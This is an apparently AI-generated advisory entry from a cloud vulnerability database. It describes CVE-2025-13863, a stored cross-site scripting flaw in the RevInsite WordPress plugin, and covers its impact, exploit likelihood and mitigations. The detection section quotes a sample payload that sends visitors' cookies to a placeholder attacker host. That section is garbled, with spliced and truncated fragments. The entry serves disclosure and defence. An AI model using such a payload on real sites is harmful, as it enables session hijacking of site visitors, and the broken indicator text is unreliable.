
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-13863 is a Stored Cross-Site Scripting (XSS) vulnerability in the RevInsite plugin for WordPress, affecting all versions up to and including 1.1.0. The flaw exists in the token parameter due to insufficient input sanitization and output escaping, allowing authenticated attackers with Contributor-level access or higher to inject arbitrary web scripts into pages. It was published on December 6, 2025, and assigned a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The token parameter in revinsite.php is not properly sanitized before being stored and rendered in page output, enabling persistent script injection (Wordfence, WordPress Plugin Trac). Exploitation requires a network-accessible WordPress instance and an authenticated account with at least Contributor-level privileges; no further user interaction is required for the injected script to execute against site visitors.
Successful exploitation allows injected malicious scripts to execute in the browsers of any user who visits an affected page, potentially leading to session hijacking, credential theft, unauthorized actions performed on behalf of victims, and defacement of site content. The scope is changed (S:C), meaning the impact extends beyond the attacker's own session to affect other users of the WordPress site. Confidentiality and integrity are both partially compromised, while availability is not directly affected (Wordfence, Red Hat CVE).
No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported as of the available data. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained by the requirement for an authenticated Contributor-level account, limiting the attack surface compared to unauthenticated vulnerabilities (Wordfence).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) in the token parameter.token parameter; repeated access to injected pages from diverse IP addresses.revinsite.php or related plugin files; presence of obfuscated JavaScript in stored post/page content in the WordPress database.wp_posts or wp_postmeta tables containing entries with embedded <script> tags or JavaScript event handlers in fields associated with RevInsite plugin output.Site administrators should update the RevInsite plugin to a version beyond 1.1.0 if a patched release becomes available; as of the disclosure date, patch availability was not confirmed. In the interim, disabling or removing the RevInsite plugin entirely is the most effective workaround. Access to Contributor-level account creation should be restricted, and existing Contributor accounts should be audited. Implementing a Web Application Firewall (WAF) with XSS filtering rules can provide additional defense-in-depth (Wordfence).
The vulnerability was discovered and reported by Wordfence, which published the initial advisory on December 6, 2025. Automated CVE tracking services including Vulners, VulDB, and CIRCL's vulnerability lookup indexed the issue shortly after disclosure. No notable independent researcher commentary or significant media coverage has been identified beyond standard vulnerability database aggregation.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."